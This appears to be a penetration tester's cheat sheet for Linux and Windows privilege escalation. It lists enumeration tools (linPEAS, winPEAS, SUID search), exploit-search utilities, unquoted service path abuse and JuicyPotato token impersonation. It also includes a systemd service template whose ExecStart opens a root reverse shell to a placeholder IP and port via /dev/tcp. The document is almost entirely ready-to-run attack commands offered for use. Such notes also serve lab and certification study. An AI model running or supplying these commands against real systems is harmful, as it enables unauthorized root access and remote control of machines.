Privilege Escalation

Enum
Linux
Windows

linPEAS.sh

# Basic linPEAS.sh usage 
# tee command: read stdin and write to stdout & file
$ ./linpeas.sh | tee log.txt

winPEAS.exe

# winPEAS.exe 
$ .\winPEAS.exe

Linux Find SUID files

# Use the command 'find' 
$ find / -perm -4000 -type f 2>/dev/null

Windows Privilege Information

# current user priv info 
$ whoami /priv

Exploit Search

# SearchSploit
# update exploitdb packages
$ searchsploit -u

# for searchsploit usage & options
$ searchsploit -h
# wes.py
# update database
$ ./windows-exploit-suggester.py --update

# suggest possible exploits
$ ./windows-exploit-suggester.py --database [yyyy-mm-dd-mssb.xlsx] --systeminfo [systeminfo.txt]

Linux systemctl

# Template service file 
# * Absolute path for binaries
# systemctl enable xxxxx.service (absolute path)
# systemctl start xxxxx
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/[ip]/[port] 0>&1'

[Install]
WantedBy=multi-user.target

Windows Unquoted Path Service Vulnerability

# enumeration
$ powershell -c "Get-Service"

$ sc qc [serviceName]

# search non Microsoft service
# auto-restart + unquoted
$ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\windows\\" | findstr /i /v """
# exploit
$ sc stop  [serviceName]
$ sc start [serviceName]

Windows Token Impersonation

# JuicyPotato
# https://github.com/ohpe/juicy-potato
$ JuicyPotato.exe -l [port] -p C:\[program path] -t * -c [CLSID]

# use .bat to execute the command
$ JuicyPotato.exe -l [port] -p C:\[.bat path] -t * -c [CLSID]